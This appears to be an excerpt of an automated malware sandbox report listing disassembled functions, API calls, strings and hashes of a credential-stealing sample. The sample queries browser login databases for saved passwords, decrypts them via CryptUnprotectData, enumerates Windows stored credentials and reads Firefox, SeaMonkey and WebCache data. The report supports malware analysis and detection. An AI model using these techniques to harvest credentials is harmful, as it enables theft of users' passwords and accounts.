                                                                                                                                                                    • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                  • memset.MSVCRT ref: 00402A95
                                                                                                                                                                    • Part of subcall function 00408C93: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,000003FF,000003FF,00402B19,?,?,000003FF,00000000), ref: 00408CA5
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00402B6E
                                                                                                                                                                    • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                    • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                    • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                  • memset.MSVCRT ref: 00402BF7
                                                                                                                                                                  • memcpy.MSVCRT ref: 00402C0A
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32 ref: 00402C31
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00402C3A
                                                                                                                                                                  Strings
                                                                                                                                                                  • chp, xrefs: 004029E6
                                                                                                                                                                  • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402A61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filememset$ByteCharMultiWide$FreeLibraryTemp$AddressChangeCloseCopyCreateDeleteDirectoryFindLoadLocalNameNotificationPathProcWindowsmemcpy
                                                                                                                                                                  • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                                                                                                                                  • API String ID: 1340729801-1844170479
                                                                                                                                                                  • Opcode ID: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
                                                                                                                                                                  • Instruction ID: 12325825b01e7d439ee1a457c4e284e7a4c6ca08c5b0c0223ff6c3e9a84d8d63
                                                                                                                                                                  • Opcode Fuzzy Hash: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
                                                                                                                                                                  • Instruction Fuzzy Hash: 61819172D00128ABDB11EBA5DC85AEE7778EF44314F1404BAF618F7291DB785F448B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409A23, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040978A: memset.MSVCRT ref: 004097B2
                                                                                                                                                                    • Part of subcall function 0040978A: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
                                                                                                                                                                    • Part of subcall function 0040978A: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
                                                                                                                                                                    • Part of subcall function 0040978A: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
                                                                                                                                                                    • Part of subcall function 0040978A: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
                                                                                                                                                                    • Part of subcall function 0040978A: _wcsicmp.MSVCRT ref: 004098B7
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                    • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                    • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409B48
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409B4D
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409B52
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                                                                                                                                  • API String ID: 327780389-4002013007
                                                                                                                                                                  • Opcode ID: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
                                                                                                                                                                  • Instruction ID: fb70aa460989ca239fd235d66d785af6871ae45b3eb53ae5652ba3f6cf74083a
                                                                                                                                                                  • Opcode Fuzzy Hash: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
                                                                                                                                                                  • Instruction Fuzzy Hash: B9411776900118BBCF119FA5DC499DFBFB9FF09760F108066F604A6252C7749E40DBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410D36, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00410D59
                                                                                                                                                                  • memset.MSVCRT ref: 00410D6E
                                                                                                                                                                  • memset.MSVCRT ref: 00410D83
                                                                                                                                                                  • memset.MSVCRT ref: 00410D98
                                                                                                                                                                  • memset.MSVCRT ref: 00410DAD
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                    • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                    • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                    • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410DD3
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410DE4
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410E1C
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410E2A
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410E63
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410E71
                                                                                                                                                                  • memset.MSVCRT ref: 00410EF7
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                  • API String ID: 2775653040-2068335096
                                                                                                                                                                  • Opcode ID: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
                                                                                                                                                                  • Instruction ID: 4a87cbf5aa2277a33565dd90cff8ebe3000d96c1f720339e2901549eb91f8fd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 8451517254121C66DB20E762DD86FCE737C9F85314F1104ABE108E6142EFB99AC4CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410F47, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00410F6A
                                                                                                                                                                  • memset.MSVCRT ref: 00410F7F
                                                                                                                                                                  • memset.MSVCRT ref: 00410F94
                                                                                                                                                                  • memset.MSVCRT ref: 00410FA9
                                                                                                                                                                  • memset.MSVCRT ref: 00410FBE
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                    • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                    • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                    • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410FE4
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410FF5
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041102D
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041103B
                                                                                                                                                                  • wcslen.MSVCRT ref: 00411074
                                                                                                                                                                  • wcslen.MSVCRT ref: 00411082
                                                                                                                                                                  • memset.MSVCRT ref: 00411108
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                  • API String ID: 2775653040-3369679110
                                                                                                                                                                  • Opcode ID: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
                                                                                                                                                                  • Instruction ID: 71a9fb945579d4cb0336c6bc71926503c314de5bf88e5d97c60d5b36565dc427
                                                                                                                                                                  • Opcode Fuzzy Hash: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
                                                                                                                                                                  • Instruction Fuzzy Hash: C3515E729012186ADB20EB51DD86FCF77BD9F85304F1140ABE208E2152EF799BC88B5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413627, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 2238633743-70141382
                                                                                                                                                                  • Opcode ID: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
                                                                                                                                                                  • Instruction ID: f29cbade6603fc4a2ab0b3c2c5315d136f5cdb5c857cdf3d96e229ab99d62a04
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
                                                                                                                                                                  • Instruction Fuzzy Hash: 07F0B774940784ABDB316F759C09E06BEE0EFA8701721491EE1C153A54D779E040CF88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040956D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403B29: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
                                                                                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
                                                                                                                                                                  • wcslen.MSVCRT ref: 004095CC
                                                                                                                                                                  • wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
                                                                                                                                                                  • memset.MSVCRT ref: 00409679
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040969A
                                                                                                                                                                  • _wcsnicmp.MSVCRT ref: 004096DF
                                                                                                                                                                  • wcschr.MSVCRT ref: 00409707
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 0040972B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                  • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                                                                                                                                  • API String ID: 1313344744-1864008983
                                                                                                                                                                  • Opcode ID: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
                                                                                                                                                                  • Instruction ID: ea1b4f48df4bf11ab27dc332c663e5edf47b9e63c97f7d7fc3a34612be846c77
                                                                                                                                                                  • Opcode Fuzzy Hash: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
                                                                                                                                                                  • Instruction Fuzzy Hash: A5511AB1D00209AFDF20DFA5C885AAEB7B8FF08304F14446AE919E7242D738AA45CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0044472E, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2827331108-0
                                                                                                                                                                  • Opcode ID: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
                                                                                                                                                                  • Instruction ID: 3deb3861b6046dda02d7dc4087396bab8fe4faf5ffc7b91e65a4640001166331
                                                                                                                                                                  • Opcode Fuzzy Hash: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A51C279C00704DFEB30AFA5D8487AE77B4FB86711F20412BF451A7292D7788882CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A420, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040A444
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                    • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A015
                                                                                                                                                                    • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A02D
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A049
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A058
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A09F
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A0AE
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040A4D0
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040A4F0
                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A51F
                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A54B
                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040A55C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                  • API String ID: 615219573-1702587658
                                                                                                                                                                  • Opcode ID: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                  • Instruction ID: a8741c9f70935d188a110af9e9e8f96ccbc1ec5a4ffe9cc29b4dc234b75738c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F419F72900219BBDB10EFA5DC85AAEBBB8FF44754F10406AE504F3281DB789E51CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409B7A, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
                                                                                                                                                                  • memset.MSVCRT ref: 00409BC2
                                                                                                                                                                    • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
                                                                                                                                                                  • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,76D7F560), ref: 00409C90
                                                                                                                                                                    • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
                                                                                                                                                                    • Part of subcall function 00408FFD: wcslen.MSVCRT ref: 0040900C
                                                                                                                                                                    • Part of subcall function 00408FFD: _memicmp.MSVCRT ref: 0040903A
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00409C5C
                                                                                                                                                                    • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                    • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                    • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                    • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                                                  • Opcode ID: 9da10080cfd8ad73592542fad7b503c35a13a598c4bcd5ee74f32142ceaa2db5
                                                                                                                                                                  • Instruction ID: b0f72644bbd87b50ea7a8f8ee73cfa3b4c243fbe701b8101a2a2b04dab44341a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9da10080cfd8ad73592542fad7b503c35a13a598c4bcd5ee74f32142ceaa2db5
                                                                                                                                                                  • Instruction Fuzzy Hash: 29319471D042196AEF50EFA5CC45ADEB7F8AF44344F11007BA519B3182DB38AE448B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A94C, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                    • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                    • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                    • Part of subcall function 0040A420: memset.MSVCRT ref: 0040A444
                                                                                                                                                                    • Part of subcall function 0040A420: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
                                                                                                                                                                    • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4D0
                                                                                                                                                                    • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4F0
                                                                                                                                                                    • Part of subcall function 0040A420: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
                                                                                                                                                                    • Part of subcall function 0040A420: GetLastError.KERNEL32 ref: 0040A51F
                                                                                                                                                                    • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A5DF
                                                                                                                                                                    • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A60D
                                                                                                                                                                    • Part of subcall function 0040A56F: _wcsupr.MSVCRT ref: 0040A627
                                                                                                                                                                    • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A676
                                                                                                                                                                    • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A6A1
                                                                                                                                                                    • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040AA14
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040AA29
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                  • API String ID: 4091582287-4196376884
                                                                                                                                                                  • Opcode ID: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
                                                                                                                                                                  • Instruction ID: e8c4dab73010a582bcb55339b064a6b15101daee4fa053d2547f161988c3f8ed
                                                                                                                                                                  • Opcode Fuzzy Hash: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
                                                                                                                                                                  • Instruction Fuzzy Hash: C731D272700204AADB20BB6ACD41A9F7669EF80344F25087FB844FB1C6DB78DD91D699
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409FF2, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040A015
                                                                                                                                                                  • memset.MSVCRT ref: 0040A02D
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A049
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A058
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A09F
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A0AE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                  • API String ID: 2036768262-2114579845
                                                                                                                                                                  • Opcode ID: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
                                                                                                                                                                  • Instruction ID: e8ec88334da27b7df1bd19bf5f92620076e348809ddf91dc3f5a530f518c7d73
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
                                                                                                                                                                  • Instruction Fuzzy Hash: F121A9B254021C55DB20E691DC85EDB73BCAF54314F5104BFF615E2081EBB8DA84465D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0044376F, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
